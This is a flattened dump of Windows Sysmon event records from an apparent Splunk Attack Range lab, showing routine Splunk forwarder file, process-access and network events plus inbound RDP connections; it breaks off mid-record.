AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53360-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000978683Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:19.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E96C4F36C2B28CAAC7E93CE96945ECE2,SHA256=961C806712E566BCCE5E2A078E0F06FE75EE5E8149260D0E2CBFD2BD6E2AC57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978682Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:19.074{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=524A515E0261F8477379768272784077,SHA256=C78253F0FB19DBDFCED544E42FD793EB261DA6C4F426426EAB531E31FB2FD62D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050098Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:20.966{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5EF6EF23ADF4C75AB8657B4D4C3E9B7,SHA256=F0C39417B2DAB090CC4857E014E2993BF1CE2A33705F5827C83D6725C16592FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978689Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:20.527{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E96C4F36C2B28CAAC7E93CE96945ECE2,SHA256=961C806712E566BCCE5E2A078E0F06FE75EE5E8149260D0E2CBFD2BD6E2AC57D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978688Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:20.386{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05AC7BF296F7495D4310370A7C1CEFAF,SHA256=B6EE0C75272C30EB5DC6B6A4D88448CA71DBAEF7C0A676AA1E540AA6779CDA55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:20.862{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B14F67EF904F607660620FFAAFEAA12E,SHA256=1A38FD9FA086619A768834BDA9A3D1A8EE019FAE87C7C2724FBC27CA41C83074,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050100Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:21.966{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=262F7DBFB1F5AE52DD838C041D69B5F4,SHA256=6DE6D98E6F22392E774ABE3847609F2854DE6CAAC1D59E29E0171C85F1F49832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978690Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:21.433{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBEDCE25ACBB21CA93F1B7444933B6DA,SHA256=D35AD7D25BBD3E146FCA13DE598E5DF38374F92AD0D0545AF13C35254A93BF23,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050099Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:19.243{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60593-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000978693Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:19.215{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64501-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978692Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:22.496{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55569A596C5671898E8FF256684EB3E1,SHA256=C0684164B02EBBB31A04F8D12B7D1195D6392B94F9749878F945954A73C527B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978691Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:22.340{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5280DF6E867971C8122B6DAAB2768FE,SHA256=04C5DD79406A42EE83AD42507BA333EA246D2D2769569079B3AC891209A11C3B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978695Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:20.857{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59380-false10.0.1.12-8000- 23542300x8000000000000000978694Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:23.714{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=192099F786CAB0C296B82F3DA28E3F8E,SHA256=8214CFFDB3AD8E6139EFC14C0258AD4BBEBD13DE0B8A24F3BEC171A2EEA00542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050101Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:23.000{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B8CB099FF50C60E6963617F82369D78,SHA256=560A8D341BB8B2817F048D8925D1C4D26EA01691D736D6142BDEFEA4DFB48312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978696Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:24.949{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E070F1B48E37933D66A029859AD5A1AA,SHA256=64196471EB83FE71BB71B48F7B371B8129A95DBA617F42C708089FC77401CE2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050103Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:22.842{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53361-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050102Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:24.018{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D7E5B69F20489365D5D520A66E381A1,SHA256=4DE03AA0F75DE3BBD560E0CE632D420477FDC11EBE12C50B9D7B9EF074A6361A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978709Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8ABD-6151-C079-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978708Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978707Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978706Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978705Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978704Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978703Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978702Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978701Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978700Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.902{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978699Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.886{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8ABD-6151-C079-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978698Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.886{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8ABD-6151-C079-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978697Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:25.887{69CF5F33-8ABD-6151-C079-00000000FD01}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050104Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:25.035{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5110FBA90919F4E919F03261469592A,SHA256=03849FAB8D40862AB3B3E21755D0E5133E960735B7360A2AA6659B106DB2B292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050106Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:26.051{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050105Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:26.036{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8585C26462EDD885A89EF208DF4AB85,SHA256=14AA8E39FFB1A3CD596A53BB64B6CB9036ABC305AD741E3EE1B1E32257159A4A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978725Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.683{69CF5F33-8ABE-6151-C179-00000000FD01}23441000C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978724Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8ABE-6151-C179-00000000FD01}2344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978723Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:26.511{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978722Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 